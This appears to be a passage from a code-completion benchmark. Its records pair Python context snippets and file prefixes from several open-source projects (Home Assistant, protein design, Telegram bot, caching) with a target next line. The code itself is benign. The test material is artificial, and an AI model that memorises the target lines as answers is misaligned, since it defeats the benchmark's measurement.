d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n\n # Custom mappings for MqttButton class\n elif isinstance(obj, MqttButton):\n d['id'] = d.pop('button_id')\n d['toplabel'] = d.pop('top_label')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n d['longdelay'] = d.pop('long_delay')\n d['longrepeat'] = d.pop('long_repeat')\n\n elif isinstance(obj, Topic):\n d['brokerid'] = d.pop('broker_id')\n d['eventtype'] = d.pop('event_type')\n\n elif isinstance(obj, MqttDisplay):\n d['fontsize'] = d.pop('font_size')\n d['topics'] = [serialize(topic) for topic in d['topics']]\n\n elif isinstance(obj, MqttBroker):\n d['brokerid'] = d.pop('broker_id')\n d['wsport'] = d.pop('ws_port')\n\n elif isinstance(obj, MqttSensor):\n d['sensorid'] = d.pop('sensor_id')\n d['topic'] = serialize(d['topic'])\n\n # Filter out None values\n return {k: v for k, v in d.items() if v is not None}\n else:\n return str(obj)\n\n return json.dumps(self, default=serialize, indent=4)"
},
{
"identifier": "DOMAIN",
"path": "custom_components/button_plus/const.py",
"snippet": "DOMAIN = \"button_plus\""
},
{
"identifier": "MANUFACTURER",
"path": "custom_components/button_plus/const.py",
"snippet": "MANUFACTURER = \"Button+\""
}
] | import logging
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers import device_registry as dr
from .button_plus_api.local_api_client import LocalApiClient
from .button_plus_api.model import DeviceConfiguration
from homeassistant.core import HomeAssistant
from .const import DOMAIN, MANUFACTURER
from homeassistant.helpers import aiohttp_client | 1,506 | """Button+ connects several devices."""
from __future__ import annotations
_LOGGER: logging.Logger = logging.getLogger(__package__)
class ButtonPlusHub:
"""hub for Button+."""
def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None:
_LOGGER.debug(f"New hub with config {config.core}")
self._hass = hass
self.config = config
self._name = config.core.name
self._id = self.config.info.device_id
self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass))
self.online = True
self.button_entities = {}
self.label_entities = {}
self.top_label_entities = {}
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
configuration_url=f"http://{self.config.info.ip_address}/",
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)},
| """Button+ connects several devices."""
from __future__ import annotations
_LOGGER: logging.Logger = logging.getLogger(__package__)
class ButtonPlusHub:
"""hub for Button+."""
def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None:
_LOGGER.debug(f"New hub with config {config.core}")
self._hass = hass
self.config = config
self._name = config.core.name
self._id = self.config.info.device_id
self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass))
self.online = True
self.button_entities = {}
self.label_entities = {}
self.top_label_entities = {}
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
configuration_url=f"http://{self.config.info.ip_address}/",
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)}, | identifiers={(DOMAIN, self.config.info.device_id)}, | 2 | 2023-12-18 15:14:21+00:00 | 2k |
RosettaCommons/AF2_peptide_hallucination | run.py | [
{
"identifier": "select_positions",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\n '''\n Select mutable positions in the binder based on a specific method.\n Returns a dictionary of binder with associated array indicating mutable positions.\n '''\n\n mutable_positions = {}\n\n if select_positions == 'random':\n # Choose positions randomly.\n mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False)\n\n elif select_positions == 'plddt':\n # Choose positions based on lowest plddt in binder sequence.\n # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower).\n\n mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate.\n \n # Get plddts from sequence object (binder) \n plddts = boundcomplex.current_prediction_results[\"plddt\"]\n \n # Take just binder segment\n plddts = plddts[:boundcomplex.binder_length,]\n \n # Weights associated with each position in the binder.\n # to account for termini systematically scoring worse in pLDDT.\n weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25])\n\n n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile)\n potential_sites = np.argsort(plddts)[:n_potential]\n\n # Select mutable sites\n sub_w = weights[potential_sites]\n sub_w = [w/np.sum(sub_w) for w in sub_w]\n sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w)\n\n mutable_positions['binder'] = sites\n\n return mutable_positions"
},
{
"identifier": "util",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\ndef get_aa_freq(AA_freq: dict, exclude_AA: str):\ndef initialize_MCMC(conf):\ndef initialize_score_file(conf) -> None:\ndef append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None:\ndef accept_or_reject(boundcomplex, T, step):\ndef write_outputs(boundcomplex, conf, i) -> None:\ndef relabel_chains(pdb_lines):\n M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate"
},
{
"identifier": "compute_loss",
"path": "util/loss.py",
"snippet": "def compute_loss(conf, boundcomplex):\n \"\"\"\n Computes losses as defined by the config file\n \"\"\"\n losses=OrderedDict()\n for loss_name in conf:\n loss_function = globals().get(loss_name, None)\n if loss_function is not None and callable(loss_function):\n losses[loss_name] = loss_function(boundcomplex)\n else:\n raise ValueError(f\"Loss function {loss_name} not found\")\n total_loss=combine_loss(losses, conf)\n return total_loss, losses"
}
] | import os
import sys
import numpy as np
import hydra
import copy
from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer
from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ
from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure
from submodules.oligomer_hallucination.modules.mutations import mutate
from util.util import select_positions
from util import util
from util.loss import compute_loss
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig | 1,507 |
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
|
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
| AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA) | 1 | 2023-12-21 12:07:25+00:00 | 2k |
Cypas/splatoon3-schedule | nonebot_plugin_splatoon3_schedule/utils/utils.py | [
{
"identifier": "TimeUtil",
"path": "nonebot_plugin_splatoon3_schedule/utils/dataClass.py",
"snippet": "class TimeUtil(object):\n @classmethod\n def parse_timezone(cls, timezone):\n \"\"\"\n 解析时区表示\n :param timezone: str eg: +8\n :return: dict{symbol, offset}\n \"\"\"\n result = re.match(r\"(?P<symbol>[+-])(?P<offset>\\d+)\", timezone)\n symbol = result.groupdict()[\"symbol\"]\n offset = int(result.groupdict()[\"offset\"])\n\n return {\"symbol\": symbol, \"offset\": offset}\n\n @classmethod\n def convert_timezone(cls, dt, timezone=\"+0\") -> datetime.datetime:\n \"\"\"默认是utc时间,需要提供时区\"\"\"\n result = cls.parse_timezone(timezone)\n symbol = result[\"symbol\"]\n\n offset = result[\"offset\"]\n\n if symbol == \"+\":\n return dt + timedelta(hours=offset)\n elif symbol == \"-\":\n return dt - timedelta(hours=offset)\n else:\n raise Exception(\"dont parse timezone format\")"
},
{
"identifier": "plugin_config",
"path": "nonebot_plugin_splatoon3_schedule/config.py",
"snippet": "class Config(BaseModel):"
}
] | import datetime
import cfscrape
import httpx
from httpx import Response
from .dataClass import TimeUtil
from ..config import plugin_config | 1,412 | "Ranked Challenge": (227, 68, 17),
"Ranked Open": (24, 200, 26),
"X Schedule": (14, 205, 147),
"打工": (14, 203, 146),
"活动": (223, 42, 119),
"祭典": (103, 103, 114),
"祭典时间-金黄": (234, 255, 61),
"上-武器卡片-黄": (234, 255, 61),
"下-武器卡片-蓝": (96, 58, 255),
"上-武器卡片": (255, 148, 157),
"下-武器卡片": (124, 217, 127),
"祭典结算项目卡片": (63, 63, 70, 70),
}
def cf_http_get(url: str):
"""cf get"""
# 实例化一个create_scraper对象
scraper = cfscrape.create_scraper()
# 请求报错,可以加上时延
# scraper = cfscrape.create_scraper(delay = 6)
if proxy_address:
cf_proxies = {
"http": "http://{}".format(proxy_address),
"https": "http://{}".format(proxy_address),
}
# 获取网页内容 代理访问
res = scraper.get(url, proxies=cf_proxies)
else:
# 获取网页内容
res = scraper.get(url)
return res
async def async_http_get(url: str) -> Response:
"""async http_get"""
async with httpx.AsyncClient(proxies=proxies) as client:
response = await client.get(url, timeout=HTTP_TIME_OUT)
return response
def http_get(url: str) -> Response:
"""http_get"""
response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT)
return response
def multiple_replace(text, _dict):
"""批量替换文本"""
for key in _dict:
text = text.replace(key, _dict[key])
return text
def get_expire_time() -> str:
"""计算过期时间 字符串 精确度为 ymdh"""
# 计算过期时间
time_now = get_time_now_china()
time_now_h = time_now.hour
# 计算过期时间字符串
# 判断当前小时是奇数还是偶数
expire_time: datetime
if (time_now_h % 2) == 0:
# 偶数
expire_time = time_now + datetime.timedelta(hours=2)
else:
expire_time = time_now + datetime.timedelta(hours=1)
expire_time_str = expire_time.strftime(time_format_ymdh).strip()
return expire_time_str
def time_converter(time_str) -> datetime:
"""时间转换 年-月-日 时:分:秒"""
# convert time to UTC+8
dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ")
dt += datetime.timedelta(hours=8)
return dt
def time_converter_yd(time_str):
"""时间转换 月-日"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m.%d")
def time_converter_hm(time_str):
"""时间转换 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%H:%M")
def time_converter_mdhm(time_str):
"""时间转换 月-日 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m-%d %H:%M")
def time_converter_weekday(time_str):
"""时间转换 周几,如周一"""
dt = time_converter(time_str)
weekday = dt.weekday()
return weekday
def get_time_ymd():
"""获取年月日"""
dt = get_time_now_china().strftime("%Y-%m-%d")
return dt
def get_time_y() -> int:
"""获取年"""
year = get_time_now_china().year
return year
def get_time_now_china() -> datetime.datetime:
"""获取中国所在东八区时间"""
# 获取utc时间,然后转东8区时间
utc_now = datetime.datetime.utcnow()
|
time_format_ymdh = "%Y-%m-%dT%H"
HTTP_TIME_OUT = 5.0 # 请求超时,秒
proxy_address = plugin_config.splatoon3_proxy_address
if proxy_address:
proxies = "http://{}".format(proxy_address)
else:
proxies = None
# 背景 rgb颜色
dict_bg_rgb = {
"Turf War": (24, 200, 26),
"Ranked Challenge": (227, 68, 17),
"Ranked Open": (24, 200, 26),
"X Schedule": (14, 205, 147),
"打工": (14, 203, 146),
"活动": (223, 42, 119),
"祭典": (103, 103, 114),
"祭典时间-金黄": (234, 255, 61),
"上-武器卡片-黄": (234, 255, 61),
"下-武器卡片-蓝": (96, 58, 255),
"上-武器卡片": (255, 148, 157),
"下-武器卡片": (124, 217, 127),
"祭典结算项目卡片": (63, 63, 70, 70),
}
def cf_http_get(url: str):
"""cf get"""
# 实例化一个create_scraper对象
scraper = cfscrape.create_scraper()
# 请求报错,可以加上时延
# scraper = cfscrape.create_scraper(delay = 6)
if proxy_address:
cf_proxies = {
"http": "http://{}".format(proxy_address),
"https": "http://{}".format(proxy_address),
}
# 获取网页内容 代理访问
res = scraper.get(url, proxies=cf_proxies)
else:
# 获取网页内容
res = scraper.get(url)
return res
async def async_http_get(url: str) -> Response:
"""async http_get"""
async with httpx.AsyncClient(proxies=proxies) as client:
response = await client.get(url, timeout=HTTP_TIME_OUT)
return response
def http_get(url: str) -> Response:
"""http_get"""
response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT)
return response
def multiple_replace(text, _dict):
"""批量替换文本"""
for key in _dict:
text = text.replace(key, _dict[key])
return text
def get_expire_time() -> str:
"""计算过期时间 字符串 精确度为 ymdh"""
# 计算过期时间
time_now = get_time_now_china()
time_now_h = time_now.hour
# 计算过期时间字符串
# 判断当前小时是奇数还是偶数
expire_time: datetime
if (time_now_h % 2) == 0:
# 偶数
expire_time = time_now + datetime.timedelta(hours=2)
else:
expire_time = time_now + datetime.timedelta(hours=1)
expire_time_str = expire_time.strftime(time_format_ymdh).strip()
return expire_time_str
def time_converter(time_str) -> datetime:
"""时间转换 年-月-日 时:分:秒"""
# convert time to UTC+8
dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ")
dt += datetime.timedelta(hours=8)
return dt
def time_converter_yd(time_str):
"""时间转换 月-日"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m.%d")
def time_converter_hm(time_str):
"""时间转换 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%H:%M")
def time_converter_mdhm(time_str):
"""时间转换 月-日 时:分"""
dt = time_converter(time_str)
return datetime.datetime.strftime(dt, "%m-%d %H:%M")
def time_converter_weekday(time_str):
"""时间转换 周几,如周一"""
dt = time_converter(time_str)
weekday = dt.weekday()
return weekday
def get_time_ymd():
"""获取年月日"""
dt = get_time_now_china().strftime("%Y-%m-%d")
return dt
def get_time_y() -> int:
"""获取年"""
year = get_time_now_china().year
return year
def get_time_now_china() -> datetime.datetime:
"""获取中国所在东八区时间"""
# 获取utc时间,然后转东8区时间
utc_now = datetime.datetime.utcnow() | convert_now = TimeUtil.convert_timezone(utc_now, "+8") | 0 | 2023-12-17 07:49:26+00:00 | 2k |
Sam-Izdat/tinycio | src/tinycio/fsio/imagefile.py | [
{
"identifier": "GraphicsFormat",
"path": "src/tinycio/fsio/format.py",
"snippet": "class GraphicsFormat(IntEnum):\n \"\"\"\n The graphics format of an image file to be saved or loaded. For a list of available options, see :ref:`ref_graphics_formats`.\n \"\"\"\n UNKNOWN = 1<<0\n UINT8 = 1<<1\n UINT16 = 1<<2\n UINT32 = 1<<3\n SFLOAT16 = 1<<4\n SFLOAT32 = 1<<5\n UNORM8 = 1<<6\n UNORM16 = 1<<7\n UNORM32 = 1<<8\n\n # Lump together any integer-type values\n I8 = UINT8 | UNORM8\n I16 = UINT16 | UNORM16\n I32 = UINT32 | UNORM32\n\n UNORM = UNORM8 | UNORM16 | UNORM32\n\n READABLE = UINT8 | UINT16 | UINT32 | UNORM8 | UNORM16 | UNORM32 | SFLOAT16 | SFLOAT32\n\n WRITABLE_PNG = UINT8 | UINT16 | UNORM8 | UNORM16\n WRITABLE_TIF = SFLOAT16 | SFLOAT32\n WRITABLE_EXR = SFLOAT16 | SFLOAT32"
},
{
"identifier": "ImageFileFormat",
"path": "src/tinycio/fsio/format.py",
"snippet": "class ImageFileFormat(IntEnum):\n # TODO: Needs to be expanded after investigating iio support\n # NOTE: Not in user API right now, as it doesn't need to be\n UNKNOWN = 1<<0\n PNG = 1<<1\n JPG = 1<<2\n EXR = 1<<3\n TIFF = 1<<4\n WEBP = 1<<5\n\n # This is annoying, so let's just...\n TIF = TIFF\n JPEG = JPG\n\n # Supported bit depth\n UINT8 = PNG | JPG | WEBP\n UINT16 = PNG\n SFLOAT16 = EXR | TIFF\n SFLOAT32 = EXR | TIFF"
}
] | import torch
import numpy as np
import typing
import os
import imageio.v3 as iio
from .format import GraphicsFormat, ImageFileFormat | 699 |
def _infer_image_file_format(ext:str) -> ImageFileFormat:
ext = ext.strip().lower()
if ext == '.png': return ImageFileFormat.PNG
elif ext == '.jpg': return ImageFileFormat.JPG
elif ext == '.jpeg': return ImageFileFormat.JPG
elif ext == '.exr': return ImageFileFormat.EXR
elif ext == '.tif': return ImageFileFormat.TIFF
elif ext == '.tiff': return ImageFileFormat.TIFF
elif ext == '.webp': return ImageFileFormat.WEBP
else: return ImageFileFormat.UNKNOWN
|
def _infer_image_file_format(ext:str) -> ImageFileFormat:
ext = ext.strip().lower()
if ext == '.png': return ImageFileFormat.PNG
elif ext == '.jpg': return ImageFileFormat.JPG
elif ext == '.jpeg': return ImageFileFormat.JPG
elif ext == '.exr': return ImageFileFormat.EXR
elif ext == '.tif': return ImageFileFormat.TIFF
elif ext == '.tiff': return ImageFileFormat.TIFF
elif ext == '.webp': return ImageFileFormat.WEBP
else: return ImageFileFormat.UNKNOWN
| def load_image(fp:str, graphics_format:GraphicsFormat=GraphicsFormat.UNKNOWN) -> torch.Tensor: | 0 | 2023-12-15 15:39:08+00:00 | 2k |
Dank-del/stats-bot | stats_bot/handlers/plot.py | [
{
"identifier": "Attachment",
"path": "stats_bot/db/models.py",
"snippet": "class Attachment(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: int = Field(foreign_key=\"user.id\")\n group_id: int = Field(foreign_key=\"group.id\")\n message_id: int = Field()\n media_type: str\n timestamp: datetime = Field(default=datetime.utcnow)"
},
{
"identifier": "Message",
"path": "stats_bot/db/models.py",
"snippet": "class Message(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: int = Field(foreign_key=\"user.id\")\n group_id: int = Field(foreign_key=\"group.id\")\n text: str\n timestamp: datetime = Field(default=datetime.utcnow)"
},
{
"identifier": "User",
"path": "stats_bot/db/models.py",
"snippet": "class User(SQLModel, table=True):\n id: int = Field(primary_key=True)\n username: Optional[str] = Field(nullable=True)\n first_name: str\n last_name: Optional[str] = Field(nullable=True)"
},
{
"identifier": "engine",
"path": "stats_bot/db/client.py",
"snippet": "def load_tables():"
},
{
"identifier": "admin",
"path": "stats_bot/decorators/admin.py",
"snippet": "def admin(func):\n \"\"\"\n Decorator that checks if the user is an admin before executing the wrapped function.\n\n Args:\n func (callable): The function to be wrapped.\n\n Returns:\n callable: The wrapped function.\n\n \"\"\"\n async def wrapper(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n member = await update.effective_chat.get_member(update.effective_user.id)\n if (\n member.status is not ChatMemberStatus.ADMINISTRATOR\n and member.status is not ChatMemberStatus.OWNER\n ):\n await update.message.reply_text(\"You are not an admin\")\n return\n return await func(update, context)\n\n return wrapper"
}
] | import pandas as pd
import matplotlib.pyplot as plt
import io
from sqlmodel import Session, select
from telegram import Update
from telegram.ext import (
ContextTypes,
)
from stats_bot.db.models import Attachment, Message, User
from stats_bot.db.client import engine
from stats_bot.decorators.admin import admin | 1,204 |
@admin
async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of messages and average message length,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating table...")
data = []
# fetch this data from database
with Session(engine) as session:
# users = session.exec(select(User)).all()
messages = session.exec(
select(Message).where(Message.group_id == update.effective_chat.id)
).all()
# make a list of users, messages of whom are in the messages variable
users = []
for message in messages:
if message.user_id not in users:
users.append(message.user_id)
# print(users)
for user in users:
usr = session.exec(select(User).where(User.id == user)).first()
msgs = session.exec(
select(Message.text).where(Message.user_id == usr.id)
).all()
data.append((usr.username or str(usr.id), msgs))
# Convert data to a pandas DataFrame
df = pd.DataFrame(data, columns=["user_id", "messages"])
print(df)
df["num_messages"] = df["messages"].apply(len)
# Calculate average message length per user
df["avg_message_length"] = df["messages"].apply(
lambda x: sum(len(message) for message in x) / len(x)
)
# Sort users by number of messages and average message length
df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False)
# Plot top 10 users
top_10_users = df.head(10)
plt.figure(figsize=(10, 6))
plt.bar(
top_10_users["user_id"],
top_10_users["num_messages"],
color="blue",
alpha=0.6,
label="Number of Messages",
)
plt.xlabel("User ID")
plt.ylabel("Number of Messages")
plt.title(
f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length"
)
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format="png")
buf.seek(0)
await msg.delete()
await context.bot.send_photo(
chat_id=update.effective_chat.id,
photo=buf,
reply_to_message_id=msg.reply_to_message.message_id,
)
@admin
async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of attachments sent,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (CallbackContext): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating attachment stats...")
data = []
# fetch this data from database
with Session(engine) as session:
attachments = session.exec(
|
@admin
async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of messages and average message length,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating table...")
data = []
# fetch this data from database
with Session(engine) as session:
# users = session.exec(select(User)).all()
messages = session.exec(
select(Message).where(Message.group_id == update.effective_chat.id)
).all()
# make a list of users, messages of whom are in the messages variable
users = []
for message in messages:
if message.user_id not in users:
users.append(message.user_id)
# print(users)
for user in users:
usr = session.exec(select(User).where(User.id == user)).first()
msgs = session.exec(
select(Message.text).where(Message.user_id == usr.id)
).all()
data.append((usr.username or str(usr.id), msgs))
# Convert data to a pandas DataFrame
df = pd.DataFrame(data, columns=["user_id", "messages"])
print(df)
df["num_messages"] = df["messages"].apply(len)
# Calculate average message length per user
df["avg_message_length"] = df["messages"].apply(
lambda x: sum(len(message) for message in x) / len(x)
)
# Sort users by number of messages and average message length
df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False)
# Plot top 10 users
top_10_users = df.head(10)
plt.figure(figsize=(10, 6))
plt.bar(
top_10_users["user_id"],
top_10_users["num_messages"],
color="blue",
alpha=0.6,
label="Number of Messages",
)
plt.xlabel("User ID")
plt.ylabel("Number of Messages")
plt.title(
f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length"
)
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format="png")
buf.seek(0)
await msg.delete()
await context.bot.send_photo(
chat_id=update.effective_chat.id,
photo=buf,
reply_to_message_id=msg.reply_to_message.message_id,
)
@admin
async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""
Generates a table of top 10 users by number of attachments sent,
and plots a bar chart to visualize the data.
Args:
update (Update): The update object containing information about the incoming message.
context (CallbackContext): The context object containing bot-related information.
Returns:
None
"""
msg = await update.effective_message.reply_text("Generating attachment stats...")
data = []
# fetch this data from database
with Session(engine) as session:
attachments = session.exec( | select(Attachment).where(Attachment.group_id == update.effective_chat.id) | 0 | 2023-12-18 03:05:36+00:00 | 2k |
EzyGang/py-cachify | py_cachify/backend/lib.py | [
{
"identifier": "AsyncWrapper",
"path": "py_cachify/backend/clients.py",
"snippet": "class AsyncWrapper:\n def __init__(self, cache: MemoryCache) -> None:\n self._cache = cache\n\n async def get(self, name: str, default: Any = None) -> Any:\n return self._cache.get(name=name, default=default)\n\n async def delete(self, *names: str) -> Any:\n self._cache.delete(*names)\n\n async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any:\n self._cache.set(name=name, value=value, ex=ex)"
},
{
"identifier": "MemoryCache",
"path": "py_cachify/backend/clients.py",
"snippet": "class MemoryCache:\n def __init__(self) -> None:\n self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {}\n\n def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None:\n self._cache[name] = value, ex and time.time() + ex\n\n def get(self, name: str, default: Any = None) -> Any:\n val, exp_at = self._cache.get(name, (default, None))\n\n if not exp_at or exp_at > time.time():\n return val\n\n self.delete(name)\n return default\n\n def delete(self, *names: str) -> None:\n for key in names:\n if key not in self._cache:\n continue\n\n del self._cache[key]"
},
{
"identifier": "CachifyInitError",
"path": "py_cachify/backend/exceptions.py",
"snippet": "class CachifyInitError(Exception):\n pass"
},
{
"identifier": "AsyncClient",
"path": "py_cachify/backend/types.py",
"snippet": "class AsyncClient(Protocol):\n async def get(self, name: str, default: Any = None) -> Any:\n raise NotImplementedError\n\n async def delete(self, *names: str) -> Any:\n raise NotImplementedError\n\n async def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:\n raise NotImplementedError"
},
{
"identifier": "SyncClient",
"path": "py_cachify/backend/types.py",
"snippet": "class SyncClient(Protocol):\n def get(self, name: str, default: Any = None) -> Any:\n raise NotImplementedError\n\n def delete(self, *names: str) -> Any:\n raise NotImplementedError\n\n def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:\n raise NotImplementedError"
}
] | import pickle
from typing import Any, Union
from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.types import AsyncClient, SyncClient | 664 | from __future__ import annotations
class Cachify:
def __init__(
| from __future__ import annotations
class Cachify:
def __init__( | self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str | 1 | 2023-12-16 22:54:51+00:00 | 2k |
lldacing/comfyui-easyapi-nodes | easyapi/ImageNode.py | [
{
"identifier": "tensor_to_pil",
"path": "easyapi/util.py",
"snippet": "def tensor_to_pil(image):\n return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))"
},
{
"identifier": "pil_to_tensor",
"path": "easyapi/util.py",
"snippet": "def pil_to_tensor(image):\n return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0)"
},
{
"identifier": "base64_to_image",
"path": "easyapi/util.py",
"snippet": "def base64_to_image(base64_string):\n # 去除前缀\n base64_list = base64_string.split(\",\", 1)\n if len(base64_list) == 2:\n prefix, base64_data = base64_list\n else:\n base64_data = base64_list[0]\n\n # 从base64字符串中解码图像数据\n image_data = base64.b64decode(base64_data)\n\n # 创建一个内存流对象\n image_stream = io.BytesIO(image_data)\n\n # 使用PIL的Image模块打开图像数据\n image = Image.open(image_stream)\n\n return image"
},
{
"identifier": "image_to_base64",
"path": "easyapi/util.py",
